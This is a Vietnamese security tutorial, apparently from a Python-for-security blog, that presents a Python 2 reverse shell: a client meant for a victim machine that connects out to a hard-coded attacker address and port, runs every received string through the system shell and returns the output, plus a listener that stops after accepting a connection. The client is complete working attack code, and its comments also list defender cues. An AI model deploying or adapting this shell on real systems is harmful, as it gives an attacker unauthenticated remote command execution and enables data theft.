Th2 112019
 

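Ví dụ này mô phỏng lại quá trình tấn công vào máy nạn nhân và thực thi các câu lệnh như ipconfig, dir… nhằm mục đích đánh cắp và thay đổi thông tin. Đoạn mã Client chạy trên máy nạn nhân, chủ động mở kết nối TCP tới Server (máy của kẻ tấn công) và thực thi mọi lệnh nhận được; kết nối này không được mã hóa và không có bước xác thực nào.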

Client

# Python For Security Pycon.vn
# Email: khanhnn@pythonvietnam.info
# Basic TCP Client
import socket                     # For Building TCP Connection
import subprocess                 # To start the shell in the system
def connect():
    """Connect out to a hard-coded TCP endpoint and run what it sends as shell commands.

    Each message read from the socket is passed unmodified to a shell, and the
    child's stdout and stderr are written back over the same socket. The loop
    ends when a message contains the substring 'terminate'.

    Points a reviewer or defender should take from this listing:
      * The connection is initiated by this host, so rules that only filter
        inbound traffic do not see it; egress filtering and outbound
        connection logging do.
      * The channel is plain TCP with no encryption and no peer authentication,
        so commands and their output are readable by network monitoring.
      * Commands run with the privileges of the process that runs this script.
      * The visible behaviour to alert on is an interpreter process that holds
        an outbound TCP connection while spawning shell child processes.

    Written for Python 2 (the companion server listing uses the print
    statement), where recv() returns str.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        # TCP over IPv4
    s.connect(('172.16.12.95', 8081))                            # hard-coded peer (the server listing binds the same address and port)
 
    while True:                                                 # one iteration per received message
        command =  s.recv(1024)                                 # read up to 1024 bytes; a longer message would be split across iterations
        
        if 'terminate' in command:                  # substring match, so any message containing 'terminate' closes the socket and ends the loop
            s.close()
            break 
        
        else:                                      # anything else is executed
            
            # shell=True hands the network-supplied string to the system shell as-is:
            # there is no validation or allow-list between the socket and the shell.
            CMD =  subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # read() returns only at end-of-file, so this blocks until the child closes stdout.
            s.send( CMD.stdout.read()  ) # send back the command output
            # NOTE(review): stderr is drained only after stdout; presumably a child that
            # writes a lot to stderr first could stall here. Order is kept as in the original.
            s.send( CMD.stderr.read()  ) # send back error output, if any (e.g. a syntax error)

def main():
    """Entry point of the client listing: hand control to connect()."""
    connect()


# Called unconditionally at module level, so the connection attempt also
# starts when this file is imported, not only when it is run as a script.
main()

Server

# Python For Security Pycon.vn
# Email: khanhnn@pythonvietnam.info
# Simple TCP Server 
import socket    # For Building TCP Connection

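def connect():
    """Bind the listening socket of the demo and accept one client connection.

    The address and port are hard-coded and must match the values in the
    client listing. The function blocks in accept() until a client connects.
    The listing on this page stops after accept(): the accepted connection
    is not used and neither socket is closed here.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # TCP over IPv4

    s.bind(("172.16.12.95", 8081))                           # listening address and port

    s.listen(1)                                              # backlog of 1: a single client is expected

    # Report the port that is actually bound above (8081, not 8080), so the
    # operator output and any captured logs agree with the real listener.
    print '[+] Listening for incoming TCP connection on port 8081'

    # accept() returns the connected socket (conn) and the peer address (addr)
    # as an (IP, port) tuple. Any host that can reach this port is accepted;
    # there is no check of who connected.
    conn, addr = s.accept()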
    

Chúc các bạn thành công !